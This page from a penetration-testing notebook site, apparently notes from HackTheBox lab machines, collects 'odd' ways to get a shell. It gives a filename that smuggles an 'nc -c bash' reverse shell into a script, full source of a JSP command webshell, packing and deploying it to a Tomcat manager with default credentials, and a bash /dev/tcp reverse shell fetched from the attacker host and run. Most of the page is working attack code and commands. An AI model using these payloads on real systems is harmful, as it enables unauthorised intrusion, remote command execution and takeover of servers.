> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/initial-access/shells/odd-shells.md).

# Odd Shells

**Shell by file name when the name was seen being used in a command within a script:**\
\#touch ';nc -c bash 10.10.14.23 2222;.php' //had to use nc like this because the '/' was acting as an escape in other rshells. Then the Php was just added to get the script to pickup the file in that case (networked htb)\
\
**WAR file webshell:**(can get stuck on rce shell upgrade // try the msfvenom war shell)\
//from the tennc github\
\#cp /opt/webshell/jsp/cmdjsp.jsp \~/htb/tabby/shell/cmdjsp.jsp //must use the same names"cmdjsp.jsp" for the shell to work\
//the default one is for windows we need to edit for linux, we also use post since it has more options that get\
\#cd \~/htb/tabby/shell\
\#nano cmdjsp.jsp\
\
\<FORM METHOD=POST ACTION='cmdjsp.jsp'>\
\<INPUT name='cmd' type=text>\
\<INPUT type=submit value='Run'>\
\</FORM>\
\
<%@ page import="java.io.\*" %>\
<%\
String cmd = request.getParameter("cmd");\
String output = "";\
\
if(cmd != null) {\
String s = null;\
try {\
Process p = Runtime.getRuntime().exec(cmd);\
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));\
while((s = sI.readLine()) != null) {\
output += s;\
}\
}\
catch(IOException e) {\
e.printStackTrace();\
}\
}\
%>\
\
\<pre>\
<%=output %>\
\</pre>\
\#jar -cvf cmdjsp.war \* This will pack all the jsp files in the current directory into the war file\
\#curl -T cmdjsp.war -u 'tomcat:s3cret' <http://10.10.10.194:8080/manager/text/deploy?path=/squanch\\>
//then navigate to <http://10.10.10.194:8080/squanch5/cmdjsp.jsp> note we are using the jsp extension again.\
now to get the rshell in the rce we have to use a file method since the shell does not like special characters:\
write to file shell.sh:\
bash -i >& /dev/tcp/10.10.14.23/3333 0>&1\
then host on 80 and curl the file to disk in the rce field:\
curl 10.10.14.23:80/shell.sh -o /tmp/shell.sh\
bash /tmp/shell.sh\
\ <br>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/initial-access/shells/odd-shells.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.